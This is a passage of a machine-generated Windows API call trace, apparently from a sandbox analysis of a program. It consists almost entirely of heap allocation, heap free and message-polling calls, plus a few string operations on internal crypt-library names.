| out: hHeap=0x970000) returned 1 [0268.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0268.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0268.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0268.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0268.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e565e8 | out: hHeap=0x970000) returned 1 [0268.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0268.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0268.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0268.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0268.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0268.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0268.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0268.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0268.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0268.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0268.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55128 | out: hHeap=0x970000) returned 1 [0268.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14260 | out: hHeap=0x970000) returned 1 [0268.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f153a0 [0268.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f157f0 | out: hHeap=0x970000) returned 1 [0268.491] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55178 [0268.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55228 [0268.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55118 [0268.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0268.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55128 [0268.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55128 | out: hHeap=0x970000) returned 1 [0268.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55118 | out: hHeap=0x970000) returned 1 [0268.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0268.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55228 | out: hHeap=0x970000) returned 1 [0268.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55178 | out: hHeap=0x970000) returned 1 [0268.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0268.491] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0268.491] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55248 [0268.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55248 | out: hHeap=0x970000) returned 1 [0268.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0268.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0268.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0268.491] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.491] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0268.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0268.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0268.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0268.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0268.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b48 [0268.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0268.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0268.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0268.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0268.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0268.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0268.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0268.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x119f0) returned 0xe61a40 [0268.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0268.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0268.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b48 | out: hHeap=0x970000) returned 1 [0268.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0268.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0268.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0268.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0268.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0268.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0268.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0268.492] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0268.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0268.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x119f0) returned 0xe73438 [0268.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe61a40 | out: hHeap=0x970000) returned 1 [0268.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0268.496] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0268.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0268.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0268.496] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0268.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0268.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0268.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0268.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0268.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0268.496] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0268.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0268.497] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0268.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0268.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0268.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a90 [0268.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0268.497] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0268.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0268.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0268.497] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0268.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0268.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0268.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51af0 [0268.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0268.497] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0268.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0268.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0268.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0268.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0268.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0268.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0268.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0268.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0268.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0268.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b20 [0268.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0268.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519d0 [0268.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b38 [0268.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b50 [0268.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0268.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0268.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51940 [0268.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519a0 [0268.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51bb0 [0268.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0268.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0268.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0268.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0268.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0268.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0268.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0268.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0268.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0268.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0268.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0268.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0268.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0268.498] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0268.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0268.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0268.498] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0268.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0268.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0268.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0268.499] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0268.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0268.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0268.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51940 [0268.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0268.499] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0268.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0268.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0268.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0268.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0268.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0268.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0268.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0268.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0268.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0268.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0268.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0268.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0268.499] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0268.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0268.499] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0268.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0268.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0268.499] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0268.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0268.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0268.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0268.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0268.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0268.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0268.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0268.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0268.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0268.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0268.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x119f0) returned 0xe61a40 [0268.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0268.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0268.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x119f0) returned 0xe84e30 [0268.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0268.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0268.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe61a40 | out: hHeap=0x970000) returned 1 [0268.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0268.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0268.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0268.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0268.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0268.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x119f0) returned 0xe61a40 [0268.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe84e30 | out: hHeap=0x970000) returned 1 [0268.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0268.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0268.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x119f0) returned 0xe84e30 [0268.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe61a40 | out: hHeap=0x970000) returned 1 [0268.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0268.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0268.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0268.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0268.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0268.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0268.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0268.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0268.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0268.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0268.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0268.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0268.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551c8 | out: hHeap=0x970000) returned 1 [0268.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0268.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0268.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0268.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0268.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e520d8 | out: hHeap=0x970000) returned 1 [0268.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0268.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55308 | out: hHeap=0x970000) returned 1 [0268.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f153a0 | out: hHeap=0x970000) returned 1 [0268.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0268.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0268.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0268.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0268.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0268.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0268.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0268.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0268.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0268.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0268.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0268.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0268.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe50048 | out: hHeap=0x970000) returned 1 [0268.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0268.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0268.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0268.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0268.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0268.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0268.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0268.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0268.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0268.505] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0268.505] HeapFree (in: hHeap=0x970000, 